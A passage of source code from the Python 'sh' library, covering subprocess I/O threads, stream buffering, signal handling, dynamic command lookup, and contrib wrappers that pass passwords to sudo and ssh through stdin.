StreamReader(
self.log.get_child("streamreader", "stdout"),
self._stdout_parent_fd, stdout, self._stdout,
ca["out_bufsize"], ca["encoding"],
ca["decode_errors"], stdout_pipe,
save_data=save_stdout)
elif self._stdout_parent_fd:
os.close(self._stdout_parent_fd)
# if stderr is going to one place (because it's grouped with stdout,
# or we're dealing with a single tty), then we don't actually need a
# stream reader for stderr, because we've already set one up for
# stdout above
self._stderr_stream = None
if stderr is not OProc.STDOUT and not single_tty and not pipe_err \
and self._stderr_parent_fd:
stderr_pipe = None
if pipe is OProc.STDERR and not ca["no_pipe"]:
stderr_pipe = self._pipe_queue
save_stderr = not ca["no_err"] and \
(ca["tee"] in ("err",) or stderr is None)
if callable(stderr):
stderr = construct_streamreader_callback(self, stderr)
self._stderr_stream = StreamReader(Logger("streamreader"),
self._stderr_parent_fd, stderr, self._stderr,
ca["err_bufsize"], ca["encoding"], ca["decode_errors"],
stderr_pipe, save_data=save_stderr)
elif self._stderr_parent_fd:
os.close(self._stderr_parent_fd)
def timeout_fn():
self.timed_out = True
self.signal(ca["timeout_signal"])
self._timeout_event = None
self._timeout_timer = None
if ca["timeout"]:
self._timeout_event = threading.Event()
self._timeout_timer = threading.Timer(ca["timeout"],
self._timeout_event.set)
self._timeout_timer.start()
# this is for cases where we know that the RunningCommand that was
# launched was not .wait()ed on to complete. in those unique cases,
# we allow the thread that processes output to report exceptions in
# that thread. it's important that we only allow reporting of the
# exception, and nothing else (like the additional stuff that
# RunningCommand.wait() does), because we want the exception to be
# re-raised in the future, if we DO call .wait()
handle_exit_code = None
if not self.command._spawned_and_waited and ca["bg_exc"]:
def fn(exit_code):
with process_assign_lock:
return self.command.handle_command_exit_code(exit_code)
handle_exit_code = fn
self._quit_threads = threading.Event()
thread_name = "background thread for pid %d" % self.pid
self._bg_thread_exc_queue = Queue(1)
self._background_thread = _start_daemon_thread(background_thread,
thread_name, self._bg_thread_exc_queue, timeout_fn,
self._timeout_event, handle_exit_code, self.is_alive,
self._quit_threads)
# start the main io threads. stdin thread is not needed if we are
# connecting from another process's stdout pipe
self._input_thread = None
self._input_thread_exc_queue = Queue(1)
if self._stdin_stream:
close_before_term = not needs_ctty
thread_name = "STDIN thread for pid %d" % self.pid
self._input_thread = _start_daemon_thread(input_thread,
thread_name, self._input_thread_exc_queue, self.log,
self._stdin_stream, self.is_alive, self._quit_threads,
close_before_term)
# this event is for cases where the subprocess that we launch
# launches its OWN subprocess and dups the stdout/stderr fds to that
# new subprocess. in that case, stdout and stderr will never EOF,
# so our output_thread will never finish and will hang. this event
# prevents that hanging
self._stop_output_event = threading.Event()
self._output_thread_exc_queue = Queue(1)
thread_name = "STDOUT/ERR thread for pid %d" % self.pid
self._output_thread = _start_daemon_thread(output_thread,
thread_name, self._output_thread_exc_queue, self.log,
self._stdout_stream, self._stderr_stream,
self._timeout_event, self.is_alive, self._quit_threads,
self._stop_output_event)
def __repr__(self):
return "<Process %d %r>" % (self.pid, self.cmd[:500])
# these next 3 properties are primary for tests
@property
def output_thread_exc(self):
exc = None
try:
exc = self._output_thread_exc_queue.get(False)
except Empty:
pass
return exc
@property
def input_thread_exc(self):
exc = None
try:
exc = self._input_thread_exc_queue.get(False)
except Empty:
pass
return exc
@property
def bg_thread_exc(self):
exc = None
try:
exc = self._bg_thread_exc_queue.get(False)
except Empty:
pass
return exc
def change_in_bufsize(self, buf):
self._stdin_stream.stream_bufferer.change_buffering(buf)
def change_out_bufsize(self, buf):
self._stdout_stream.stream_bufferer.change_buffering(buf)
def change_err_bufsize(self, buf):
self._stderr_stream.stream_bufferer.change_buffering(buf)
@property
def stdout(self):
return "".encode(self.call_args["encoding"]).join(self._stdout)
@property
def stderr(self):
return "".encode(self.call_args["encoding"]).join(self._stderr)
def get_pgid(self):
""" return the CURRENT group id of the process. this differs from
self.pgid in that this reflects the current state of the process, where
self.pgid is the group id at launch """
return os.getpgid(self.pid)
def get_sid(self):
""" return the CURRENT session id of the process. this differs from
self.sid in that this reflects the current state of the process, where
self.sid is the session id at launch """
return os.getsid(self.pid)
def signal_group(self, sig):
self.log.debug("sending signal %d to group", sig)
os.killpg(self.get_pgid(), sig)
def signal(self, sig):
self.log.debug("sending signal %d", sig)
os.kill(self.pid, sig)
def kill_group(self):
self.log.debug("killing group")
self.signal_group(signal.SIGKILL)
def kill(self):
self.log.debug("killing")
self.signal(signal.SIGKILL)
def terminate(self):
self.log.debug("terminating")
self.signal(signal.SIGTERM)
def is_alive(self):
""" polls if our child process has completed, without blocking. this
method has side-effects, such as setting our exit_code, if we happen to
see our child exit while this is running """
if self.exit_code is not None:
return False, self.exit_code
# what we're doing here essentially is making sure that the main thread
# (or another thread), isn't calling .wait() on the process. because
# .wait() calls os.waitpid(self.pid, 0), we can't do an os.waitpid
# here...because if we did, and the process exited while in this
# thread, the main thread's os.waitpid(self.pid, 0) would raise OSError
# (because the process ended in another thread).
#
# so essentially what we're doing is, using this lock, checking if
# we're calling .wait(), and if we are, let .wait() get the exit code
# and handle the status, otherwise let us do it.
acquired = self._wait_lock.acquire(False)
if not acquired:
if self.exit_code is not None:
return False, self.exit_code
return True, self.exit_code
try:
# WNOHANG is just that...we're calling waitpid without hanging...
# essentially polling the process. the return result is (0, 0) if
# there's no process status, so we check that pid == self.pid below
# in order to determine how to proceed
pid, exit_code = no_interrupt(os.waitpid, self.pid, os.WNOHANG)
if pid == self.pid:
self.exit_code = handle_process_exit_code(exit_code)
self._process_just_ended()
return False, self.exit_code
# no child process
except OSError:
return False, self.exit_code
else:
return True, self.exit_code
finally:
self._wait_lock.release()
def _process_just_ended(self):
if self._timeout_timer:
self._timeout_timer.cancel()
done_callback = self.call_args["done"]
if done_callback:
success = self.exit_code in self.call_args["ok_code"]
done_callback(success, self.exit_code)
# this can only be closed at the end of the process, because it might be
# the CTTY, and closing it prematurely will send a SIGHUP. we also
# don't want to close it if there's a self._stdin_stream, because that
# is in charge of closing it also
if self._stdin_parent_fd and not self._stdin_stream:
os.close(self._stdin_parent_fd)
def wait(self):
""" waits for the process to complete, handles the exit code """
self.log.debug("acquiring wait lock to wait for completion")
# using the lock in a with-context blocks, which is what we want if
# we're running wait()
with self._wait_lock:
self.log.debug("got wait lock")
witnessed_end = False
if self.exit_code is None:
self.log.debug("exit code not set, waiting on pid")
pid, exit_code = no_interrupt(os.waitpid, self.pid, 0) # blocks
self.exit_code = handle_process_exit_code(exit_code)
witnessed_end = True
else:
self.log.debug("exit code already set (%d), no need to wait",
self.exit_code)
self._quit_threads.set()
# we may not have a thread for stdin, if the pipe has been connected
# via _piped="direct"
if self._input_thread:
self._input_thread.join()
# wait, then signal to our output thread that the child process is
# done, and we should have finished reading all the stdout/stderr
# data that we can by now
timer = threading.Timer(2.0, self._stop_output_event.set)
timer.start()
# wait for our stdout and stderr streamreaders to finish reading and
# aggregating the process output
self._output_thread.join()
timer.cancel()
self._background_thread.join()
if witnessed_end:
self._process_just_ended()
return self.exit_code
def input_thread(log, stdin, is_alive, quit, close_before_term):
""" this is run in a separate thread. it writes into our process's
stdin (a streamwriter) and waits the process to end AND everything that
can be written to be written """
done = False
closed = False
alive = True
poller = Poller()
poller.register_write(stdin)
while poller and alive:
changed = poller.poll(1)
for fd, events in changed:
if events & (POLLER_EVENT_WRITE | POLLER_EVENT_HUP):
log.debug("%r ready for more input", stdin)
done = stdin.write()
if done:
poller.unregister(stdin)
if close_before_term:
stdin.close()
closed = True
alive, _ = is_alive()
while alive:
quit.wait(1)
alive, _ = is_alive()
if not closed:
stdin.close()
def event_wait(ev, timeout=None):
triggered = ev.wait(timeout)
if IS_PY26:
triggered = ev.is_set()
return triggered
def background_thread(timeout_fn, timeout_event, handle_exit_code, is_alive,
quit):
""" handles the timeout logic """
# if there's a timeout event, loop
if timeout_event:
while not quit.is_set():
timed_out = event_wait(timeout_event, 0.1)
if timed_out:
timeout_fn()
break
# handle_exit_code will be a function ONLY if our command was NOT waited on
# as part of its spawning. in other words, it's probably a background
# command
#
# this reports the exit code exception in our thread. it's purely for the
# user's awareness, and cannot be caught or used in any way, so it's ok to
# suppress this during the tests
if handle_exit_code and not RUNNING_TESTS: # pragma: no cover
alive = True
while alive:
quit.wait(1)
alive, exit_code = is_alive()
handle_exit_code(exit_code)
def output_thread(log, stdout, stderr, timeout_event, is_alive, quit,
stop_output_event):
""" this function is run in a separate thread. it reads from the
process's stdout stream (a streamreader), and waits for it to claim that
its done """
poller = Poller()
if stdout is not None:
poller.register_read(stdout)
if stderr is not None:
poller.register_read(stderr)
# this is our poll loop for polling stdout or stderr that is ready to
# be read and processed. if one of those streamreaders indicate that it
# is done altogether being read from, we remove it from our list of
# things to poll. when no more things are left to poll, we leave this
# loop and clean up
while poller:
changed = no_interrupt(poller.poll, 0.1)
for f, events in changed:
if events & (POLLER_EVENT_READ | POLLER_EVENT_HUP):
log.debug("%r ready to be read from", f)
done = f.read()
if done:
poller.unregister(f)
elif events & POLLER_EVENT_ERROR:
# for some reason, we have to just ignore streams that have had an
# error. i'm not exactly sure why, but don't remove this until we
# figure that out, and create a test for it
pass
if timeout_event and timeout_event.is_set():
break
if stop_output_event.is_set():
break
# we need to wait until the process is guaranteed dead before closing our
# outputs, otherwise SIGPIPE
alive, _ = is_alive()
while alive:
quit.wait(1)
alive, _ = is_alive()
if stdout:
stdout.close()
if stderr:
stderr.close()
class DoneReadingForever(Exception): pass
class NotYetReadyToRead(Exception): pass
def determine_how_to_read_input(input_obj):
""" given some kind of input object, return a function that knows how to
read chunks of that input object.
each reader function should return a chunk and raise a DoneReadingForever
exception, or return None, when there's no more data to read
NOTE: the function returned does not need to care much about the requested
buffering type (eg, unbuffered vs newline-buffered). the StreamBufferer
will take care of that. these functions just need to return a
reasonably-sized chunk of data. """
get_chunk = None
if isinstance(input_obj, Queue):
log_msg = "queue"
get_chunk = get_queue_chunk_reader(input_obj)
elif callable(input_obj):
log_msg = "callable"
get_chunk = get_callable_chunk_reader(input_obj)
# also handles stringio
elif hasattr(input_obj, "read"):
log_msg = "file descriptor"
get_chunk = get_file_chunk_reader(input_obj)
elif isinstance(input_obj, basestring):
log_msg = "string"
get_chunk = get_iter_string_reader(input_obj)
elif isinstance(input_obj, bytes):
log_msg = "bytes"
get_chunk = get_iter_string_reader(input_obj)
elif isinstance(input_obj, GeneratorType):
log_msg = "generator"
get_chunk = get_iter_chunk_reader(iter(input_obj))
elif input_obj is None:
log_msg = "None"
def raise_():
raise DoneReadingForever
get_chunk = raise_
else:
try:
it = iter(input_obj)
except TypeError:
raise Exception("unknown input object")
else:
log_msg = "general iterable"
get_chunk = get_iter_chunk_reader(it)
return get_chunk, log_msg
def get_queue_chunk_reader(stdin):
def fn():
try:
chunk = stdin.get(True, 0.1)
except Empty:
raise NotYetReadyToRead
if chunk is None:
raise DoneReadingForever
return chunk
return fn
def get_callable_chunk_reader(stdin):
def fn():
try:
data = stdin()
except DoneReadingForever:
raise
if not data:
raise DoneReadingForever
return data
return fn
def get_iter_string_reader(stdin):
""" return an iterator that returns a chunk of a string every time it is
called. notice that even though bufsize_type might be line buffered, we're
not doing any line buffering here. that's because our StreamBufferer
handles all buffering. we just need to return a reasonable-sized chunk. """
bufsize = 1024
iter_str = (stdin[i:i + bufsize] for i in range(0, len(stdin), bufsize))
return get_iter_chunk_reader(iter_str)
def get_iter_chunk_reader(stdin):
def fn():
try:
if IS_PY3:
chunk = stdin.__next__()
else:
chunk = stdin.next()
return chunk
except StopIteration:
raise DoneReadingForever
return fn
def get_file_chunk_reader(stdin):
bufsize = 1024
def fn():
# python 3.* includes a fileno on stringios, but accessing it throws an
# exception. that exception is how we'll know we can't do a poll on
# stdin
is_real_file = True
if IS_PY3:
try:
stdin.fileno()
except UnsupportedOperation:
is_real_file = False
# this poll is for files that may not yet be ready to read. we test
# for fileno because StringIO/BytesIO cannot be used in a poll
if is_real_file and hasattr(stdin, "fileno"):
poller = Poller()
poller.register_read(stdin)
changed = poller.poll(0.1)
ready = False
for fd, events in changed:
if events & (POLLER_EVENT_READ | POLLER_EVENT_HUP):
ready = True
if not ready:
raise NotYetReadyToRead
chunk = stdin.read(bufsize)
if not chunk:
raise DoneReadingForever
else:
return chunk
return fn
def bufsize_type_to_bufsize(bf_type):
""" for a given bufsize type, return the actual bufsize we will read.
notice that although 1 means "newline-buffered", we're reading a chunk size
of 1024. this is because we have to read something. we let a
StreamBufferer instance handle splitting our chunk on newlines """
# newlines
if bf_type == 1:
bufsize = 1024
# unbuffered
elif bf_type == 0:
bufsize = 1
# or buffered by specific amount
else:
bufsize = bf_type
return bufsize
class StreamWriter(object):
""" StreamWriter reads from some input (the stdin param) and writes to a fd
(the stream param). the stdin may be a Queue, a callable, something with
the "read" method, a string, or an iterable """
def __init__(self, log, stream, stdin, bufsize_type, encoding, tty_in):
self.stream = stream
self.stdin = stdin
self.log = log
self.encoding = encoding
self.tty_in = tty_in
self.stream_bufferer = StreamBufferer(bufsize_type, self.encoding)
self.get_chunk, log_msg = determine_how_to_read_input(stdin)
self.log.debug("parsed stdin as a %s", log_msg)
def fileno(self):
""" defining this allows us to do poll on an instance of this
class """
return self.stream
def write(self):
""" attempt to get a chunk of data to write to our child process's
stdin, then write it. the return value answers the questions "are we
done writing forever?" """
# get_chunk may sometimes return bytes, and sometimes return strings
# because of the nature of the different types of STDIN objects we
# support
try:
chunk = self.get_chunk()
if chunk is None:
raise DoneReadingForever
except DoneReadingForever:
self.log.debug("done reading")
if self.tty_in:
# EOF time
try:
char = termios.tcgetattr(self.stream)[6][termios.VEOF]
except:
char = chr(4).encode()
# normally, one EOF should be enough to signal to an program
# that is read()ing, to return 0 and be on your way. however,
# some programs are misbehaved, like python3.1 and python3.2.
# they don't stop reading sometimes after read() returns 0.
# this can be demonstrated with the following program:
#
# import sys
# sys.stdout.write(sys.stdin.read())
#
# then type 'a' followed by ctrl-d 3 times. in python
# 2.6,2.7,3.3,3.4,3.5,3.6, it only takes 2 ctrl-d to terminate.
# however, in python 3.1 and 3.2, it takes all 3.
#
# so here we send an extra EOF along, just in case. i don't
# believe it can hurt anything
os.write(self.stream, char)
os.write(self.stream, char)
return True
except NotYetReadyToRead:
self.log.debug("received no data")
return False
# if we're not bytes, make us bytes
if IS_PY3 and hasattr(chunk, "encode"):
chunk = chunk.encode(self.encoding)
for proc_chunk in self.stream_bufferer.process(chunk):
self.log.debug("got chunk size %d: %r", len(proc_chunk),
proc_chunk[:30])
self.log.debug("writing chunk to process")
try:
os.write(self.stream, proc_chunk)
except OSError:
self.log.debug("OSError writing stdin chunk")
return True
def close(self):
self.log.debug("closing, but flushing first")
chunk = self.stream_bufferer.flush()
self.log.debug("got chunk size %d to flush: %r", len(chunk), chunk[:30])
try:
if chunk:
os.write(self.stream, chunk)
except OSError:
pass
os.close(self.stream)
def determine_how_to_feed_output(handler, encoding, decode_errors):
if callable(handler):
process, finish = get_callback_chunk_consumer(handler, encoding,
decode_errors)
# in py3, this is used for bytes
elif isinstance(handler, (cStringIO, iocStringIO)):
process, finish = get_cstringio_chunk_consumer(handler)
# in py3, this is used for unicode
elif isinstance(handler, (StringIO, ioStringIO)):
process, finish = get_stringio_chunk_consumer(handler, encoding,
decode_errors)
elif hasattr(handler, "write"):
process, finish = get_file_chunk_consumer(handler)
else:
try:
handler = int(handler)
except (ValueError, TypeError):
process = lambda chunk: False
finish = lambda: None
else:
process, finish = get_fd_chunk_consumer(handler)
return process, finish
def get_fd_chunk_consumer(handler):
handler = fdopen(handler, "w", closefd=False)
return get_file_chunk_consumer(handler)
def get_file_chunk_consumer(handler):
encode = lambda chunk: chunk
if getattr(handler, "encoding", None):
encode = lambda chunk: chunk.decode(handler.encoding)
flush = lambda: None
if hasattr(handler, "flush"):
flush = handler.flush
def process(chunk):
handler.write(encode(chunk))
# we should flush on an fd. chunk is already the correctly-buffered
# size, so we don't need the fd buffering as well
flush()
return False
def finish():
flush()
return process, finish
def get_callback_chunk_consumer(handler, encoding, decode_errors):
def process(chunk):
# try to use the encoding first, if that doesn't work, send
# the bytes, because it might be binary
try:
chunk = chunk.decode(encoding, decode_errors)
except UnicodeDecodeError:
pass
return handler(chunk)
def finish():
pass
return process, finish
def get_cstringio_chunk_consumer(handler):
def process(chunk):
handler.write(chunk)
return False
def finish():
pass
return process, finish
def get_stringio_chunk_consumer(handler, encoding, decode_errors):
def process(chunk):
handler.write(chunk.decode(encoding, decode_errors))
return False
def finish():
pass
return process, finish
class StreamReader(object):
""" reads from some output (the stream) and sends what it just read to the
handler. """
def __init__(self, log, stream, handler, buffer, bufsize_type, encoding,
decode_errors, pipe_queue=None, save_data=True):
self.stream = stream
self.buffer = buffer
self.save_data = save_data
self.encoding = encoding
self.decode_errors = decode_errors
self.pipe_queue = None
if pipe_queue:
self.pipe_queue = weakref.ref(pipe_queue)
self.log = log
self.stream_bufferer = StreamBufferer(bufsize_type, self.encoding,
self.decode_errors)
self.bufsize = bufsize_type_to_bufsize(bufsize_type)
self.process_chunk, self.finish_chunk_processor = \
determine_how_to_feed_output(handler, encoding, decode_errors)
self.should_quit = False
def fileno(self):
""" defining this allows us to do poll on an instance of this
class """
return self.stream
def close(self):
chunk = self.stream_bufferer.flush()
self.log.debug("got chunk size %d to flush: %r", len(chunk), chunk[:30])
if chunk:
self.write_chunk(chunk)
self.finish_chunk_processor()
if self.pipe_queue and self.save_data:
self.pipe_queue().put(None)
os.close(self.stream)
def write_chunk(self, chunk):
# in PY3, the chunk coming in will be bytes, so keep that in mind
if not self.should_quit:
self.should_quit = self.process_chunk(chunk)
if self.save_data:
self.buffer.append(chunk)
if self.pipe_queue:
self.log.debug("putting chunk onto pipe: %r", chunk[:30])
self.pipe_queue().put(chunk)
def read(self):
# if we're PY3, we're reading bytes, otherwise we're reading
# str
try:
chunk = no_interrupt(os.read, self.stream, self.bufsize)
except OSError as e:
self.log.debug("got errno %d, done reading", e.errno)
return True
if not chunk:
self.log.debug("got no chunk, done reading")
return True
self.log.debug("got chunk size %d: %r", len(chunk), chunk[:30])
for chunk in self.stream_bufferer.process(chunk):
self.write_chunk(chunk)
class StreamBufferer(object):
""" this is used for feeding in chunks of stdout/stderr, and breaking it up
into chunks that will actually be put into the internal buffers. for
example, if you have two processes, one being piped to the other, and you
want that, first process to feed lines of data (instead of the chunks
however they come in), OProc will use an instance of this class to chop up
the data and feed it as lines to be sent down the pipe """
def __init__(self, buffer_type, encoding=DEFAULT_ENCODING,
decode_errors="strict"):
# 0 for unbuffered, 1 for line, everything else for that amount
self.type = buffer_type
self.buffer = []
self.n_buffer_count = 0
self.encoding = encoding
self.decode_errors = decode_errors
# this is for if we change buffering types. if we change from line
# buffered to unbuffered, its very possible that our self.buffer list
# has data that was being saved up (while we searched for a newline).
# we need to use that up, so we don't lose it
self._use_up_buffer_first = False
# the buffering lock is used because we might change the buffering
# types from a different thread. for example, if we have a stdout
# callback, we might use it to change the way stdin buffers. so we
# lock
self._buffering_lock = threading.RLock()
self.log = Logger("stream_bufferer")
def change_buffering(self, new_type):
# TODO, when we stop supporting 2.6, make this a with context
self.log.debug("acquiring buffering lock for changing buffering")
self._buffering_lock.acquire()
self.log.debug("got buffering lock for changing buffering")
try:
if new_type == 0:
self._use_up_buffer_first = True
self.type = new_type
finally:
self._buffering_lock.release()
self.log.debug("released buffering lock for changing buffering")
def process(self, chunk):
# MAKE SURE THAT THE INPUT IS PY3 BYTES
# THE OUTPUT IS ALWAYS PY3 BYTES
# TODO, when we stop supporting 2.6, make this a with context
self.log.debug("acquiring buffering lock to process chunk (buffering: %d)", self.type)
self._buffering_lock.acquire()
self.log.debug("got buffering lock to process chunk (buffering: %d)", self.type)
try:
# unbuffered
if self.type == 0:
if self._use_up_buffer_first:
self._use_up_buffer_first = False
to_write = self.buffer
self.buffer = []
to_write.append(chunk)
return to_write
return [chunk]
# line buffered
elif self.type == 1:
total_to_write = []
nl = "\n".encode(self.encoding)
while True:
newline = chunk.find(nl)
if newline == -1:
break
chunk_to_write = chunk[:newline + 1]
if self.buffer:
chunk_to_write = b"".join(self.buffer) + chunk_to_write
self.buffer = []
self.n_buffer_count = 0
chunk = chunk[newline + 1:]
total_to_write.append(chunk_to_write)
if chunk:
self.buffer.append(chunk)
self.n_buffer_count += len(chunk)
return total_to_write
# N size buffered
else:
total_to_write = []
while True:
overage = self.n_buffer_count + len(chunk) - self.type
if overage >= 0:
ret = "".encode(self.encoding).join(self.buffer) + chunk
chunk_to_write = ret[:self.type]
chunk = ret[self.type:]
total_to_write.append(chunk_to_write)
self.buffer = []
self.n_buffer_count = 0
else:
self.buffer.append(chunk)
self.n_buffer_count += len(chunk)
break
return total_to_write
finally:
self._buffering_lock.release()
self.log.debug("released buffering lock for processing chunk (buffering: %d)", self.type)
def flush(self):
self.log.debug("acquiring buffering lock for flushing buffer")
self._buffering_lock.acquire()
self.log.debug("got buffering lock for flushing buffer")
try:
ret = "".encode(self.encoding).join(self.buffer)
self.buffer = []
return ret
finally:
self._buffering_lock.release()
self.log.debug("released buffering lock for flushing buffer")
def with_lock(lock):
def wrapped(fn):
fn = contextmanager(fn)
@contextmanager
def wrapped2(*args, **kwargs):
with lock:
with fn(*args, **kwargs):
yield
return wrapped2
return wrapped
@with_lock(PUSHD_LOCK)
def pushd(path):
""" pushd changes the actual working directory for the duration of the
context, unlike the _cwd arg this will work with other built-ins such as
sh.glob correctly """
orig_path = os.getcwd()
os.chdir(path)
try:
yield
finally:
os.chdir(orig_path)
@contextmanager
def args(**kwargs):
""" allows us to temporarily override all the special keyword parameters in
a with context """
kwargs_str = ",".join(["%s=%r" % (k,v) for k,v in kwargs.items()])
raise DeprecationWarning("""
sh.args() has been deprecated because it was never thread safe. use the
following instead:
sh2 = sh({kwargs})
sh2.your_command()
or
sh2 = sh({kwargs})
from sh2 import your_command
your_command()
""".format(kwargs=kwargs_str))
class Environment(dict):
""" this allows lookups to names that aren't found in the global scope to be
searched for as a program name. for example, if "ls" isn't found in this
module's scope, we consider it a system program and try to find it.
we use a dict instead of just a regular object as the base class because the
exec() statement used in the run_repl requires the "globals" argument to be a
dictionary """
# this is a list of all of the names that the sh module exports that will
# not resolve to functions. we don't want to accidentally shadow real
# commands with functions/imports that we define in sh.py. for example,
# "import time" may override the time system program
whitelist = set([
"Command",
"RunningCommand",
"CommandNotFound",
"DEFAULT_ENCODING",
"DoneReadingForever",
"ErrorReturnCode",
"NotYetReadyToRead",
"SignalException",
"ForkException",
"TimeoutException",
"__project_url__",
"__version__",
"__file__",
"args",
"pushd",
"glob",
"contrib",
])
def __init__(self, globs, baked_args={}):
""" baked_args are defaults for the 'sh' execution context. for
example:
tmp = sh(_out=StringIO())
'out' would end up in here as an entry in the baked_args dict """
self.globs = globs
self.baked_args = baked_args
self.disable_whitelist = False
def __getitem__(self, k):
# if we first import "_disable_whitelist" from sh, we can import
# anything defined in the global scope of sh.py. this is useful for our
# tests
if k == "_disable_whitelist":
self.disable_whitelist = True
return None
# we're trying to import something real (maybe), see if it's in our
# global scope
if k in self.whitelist or self.disable_whitelist:
return self.globs[k]
# somebody tried to be funny and do "from sh import *"
if k == "__all__":
warnings.warn("Cannot import * from sh. Please import sh or import programs individually.")
return []
# check if we're naming a dynamically generated ReturnCode exception
exc = get_exc_from_name(k)
if exc:
return exc
# https://github.com/ipython/ipython/issues/2577
# https://github.com/amoffat/sh/issues/97#issuecomment-10610629
if k.startswith("__") and k.endswith("__"):
raise AttributeError
# is it a custom builtin?
builtin = getattr(self, "b_" + k, None)
if builtin:
return builtin
# is it a command?
cmd = resolve_command(k, self.baked_args)
if cmd:
return cmd
# how about an environment variable?
# this check must come after testing if its a command, because on some
# systems, there are an environment variables that can conflict with
# command names.
# https://github.com/amoffat/sh/issues/238
try:
return os.environ[k]
except KeyError:
pass
# nothing found, raise an exception
raise CommandNotFound(k)
# methods that begin with "b_" are custom builtins and will override any
# program that exists in our path. this is useful for things like
# common shell builtins that people are used to, but which aren't actually
# full-fledged system binaries
def b_cd(self, path=None):
if path:
os.chdir(path)
else:
os.chdir(os.path.expanduser('~'))
def b_which(self, program, paths=None):
return which(program, paths)
class Contrib(ModuleType): # pragma: no cover
@classmethod
def __call__(cls, name):
def wrapper1(fn):
@property
def cmd_getter(self):
cmd = resolve_command(name)
if not cmd:
raise CommandNotFound(name)
new_cmd = fn(cmd)
return new_cmd
setattr(cls, name, cmd_getter)
return fn
return wrapper1
mod_name = __name__ + ".contrib"
contrib = Contrib(mod_name)
sys.modules[mod_name] = contrib
@contrib("git")
def git(orig): # pragma: no cover
""" most git commands play nicer without a TTY """
cmd = orig.bake(_tty_out=False)
return cmd
@contrib("sudo")
def sudo(orig): # pragma: no cover
""" a nicer version of sudo that uses getpass to ask for a password, or
allows the first argument to be a string password """
prompt = "[sudo] password for %s: " % getpass.getuser()
def stdin():
pw = getpass.getpass(prompt=prompt) + "\n"
yield pw
def process(args, kwargs):
password = kwargs.pop("password", None)
if password is None:
pass_getter = stdin()
else:
pass_getter = password.rstrip("\n") + "\n"
kwargs["_in"] = pass_getter
return args, kwargs
cmd = orig.bake("-S", _arg_preprocess=process)
return cmd
@contrib("ssh")
def ssh(orig): # pragma: no cover
""" An ssh command for automatic password login """
class SessionContent(object):
def __init__(self):
self.chars = deque(maxlen=50000)
self.lines = deque(maxlen=5000)
self.line_chars = []
self.last_line = ""
self.cur_char = ""
def append_char(self, char):
if char == "\n":
line = self.cur_line
self.last_line = line
self.lines.append(line)
self.line_chars = []
else:
self.line_chars.append(char)
self.chars.append(char)
self.cur_char = char
@property
def cur_line(self):
line = "".join(self.line_chars)
return line
class SSHInteract(object):
def __init__(self, prompt_match, pass_getter, out_handler, login_success):
self.prompt_match = prompt_match
self.pass_getter = pass_getter
self.out_handler = out_handler
self.login_success = login_success
self.content = SessionContent()
# some basic state
self.pw_entered = False
self.success = False
def __call__(self, char, stdin):
self.content.append_char(char)
if self.pw_entered and not self.success:
self.success = self.login_success(self.content)
if self.success:
return self.out_handler(self.content, stdin)
if self.prompt_match(self.content):
password = self.pass_getter()
stdin.put(password + "\n")
self.pw_entered = True
def process(args, kwargs):
real_out_handler = kwargs.pop("interact")
password = kwargs.pop("password", None)
login_success = kwargs.pop("login_success", None)
prompt_match = kwargs.pop("prompt", None)
prompt = "Please enter SSH password: "
if prompt_match is None:
prompt_match = lambda content: content.cur_line.endswith("password: ")
if password is None:
pass_getter = lambda: getpass.getpass(prompt=prompt)
else:
pass_getter = lambda: password.rstrip("\n")
if login_success is None:
login_success = lambda content: True
kwargs["_out"] = SSHInteract(prompt_match, pass_getter, real_out_handler, login_success)
return args, kwargs
cmd = orig.bake(_out_bufsize=0, _tty_in=True, _unify_ttys=True, _arg_preprocess=process)
return cmd
def run_repl(env): # pragma: no cover
banner = "\n>> sh v{version}\n>> https://github.com/amoffat/sh\n"
print(banner.format(version=__version__))
while True:
try:
line = raw_input("sh> ")
except (ValueError, EOFError):
break
try:
exec(compile(line, "<dummy>", "single"), env, env)
except SystemExit:
break
except:
print(traceback.format_exc())
# cleans up our last line
print("")
# this is a thin wrapper around THIS module (we patch sys.modules[__name__]).
# this is in the case that the user does a "from sh import whatever"
# in other words, they only want to import certain programs, not the whole
# system PATH worth of commands. in this case, we just proxy the
# import lookup to our Environment class
class SelfWrapper(ModuleType):
def __init__(self, self_module, baked_args={}):
# this is super ugly to have to copy attributes like this,
# but it seems to be the only way to make reload() behave
# nicely. if i make these attributes dynamic lookups in
# __getattr__, reload sometimes chokes in weird ways...
for attr in ["__builtins__", "__doc__", "__file__", "__name__", "__package__"]:
setattr(self, attr, getattr(self_module, attr, None))
# python 3.2 (2.7 and 3.3 work fine) breaks on osx (not ubuntu)
# if we set this to None. and 3.3 needs a value for __path__
self.__path__ = []
self.__self_module = self_module
self.__env = Environment(globals(), baked_args=baked_args)
def __getattr__(self, name):
return self.__env[name]
def __call__(self, **kwargs):
""" returns a new SelfWrapper object, where all commands spawned from it
have the baked_args kwargs set on them by default """
baked_args = self.__env.baked_args.copy()
baked_args.update(kwargs)
new_mod = self.__class__(self.__self_module, baked_args)
# inspect the line in the parent frame that calls and assigns the new sh
# variable, and get the name of the new variable we're assigning to.
# this is very brittle and pretty much a sin. but it works in 99% of
# the time and the tests pass
#
# the reason we need to do this is because we need to remove the old
# cached module from sys.modules. if we don't, it gets re-used, and any
# old baked params get used, which is not what we want
parent = inspect.stack()[1]
try:
code = parent[4][0].strip()
except TypeError:
# On the REPL or from the commandline, we don't get the source code in the
# top stack frame
# Older versions of pypy don't set parent[1] the same way as CPython or newer versions
# of Pypy so we have to special case that too.
if parent[1] in ('<stdin>', '<string>') or (
parent[1] == '<module>' and platform.python_implementation().lower() == 'pypy'):
# This depends on things like Python's calling convention and the layout of stack
# frames but it's a fix for a bug in a very cornery cornercase so....
module_name = parent[0].f_code.co_names[-1]
else:
raise
else:
parsed = ast.parse(code)
try:
module_name = parsed.body[0].targets[0].id
except Exception:
# Diagnose what went wrong
if not isinstance(parsed.body[0], ast.Assign):
raise RuntimeError("A new execution context must be assigned to a variable")
raise
if module_name == __name__:
raise RuntimeError("Cannot use the name '%s' as an execution context" % __name__)
sys.modules.pop(module_name, None)
return new_mod
def in_importlib(frame):
""" helper for checking if a filename is in importlib guts """
return frame.f_code.co_filename == "<frozen importlib._bootstrap>"
def register_importer():
""" registers our fancy importer that can let us import from a module name,
like:
import sh
tmp = sh()
from tmp import ls
"""
def test(importer):
try:
return importer.__class__.__name__ == ModuleImporterFromVariables.__name__
except AttributeError:
# ran into importer which is not a class instance
return False
already_registered = any([True for i in sys.meta_path if test(i)])
if not already_registered:
importer = ModuleImporterFromVariables(
restrict_to=[SelfWrapper.__name__],
)
sys.meta_path.insert(0, importer)
return not already_registered
def fetch_module_from_frame(name, frame):
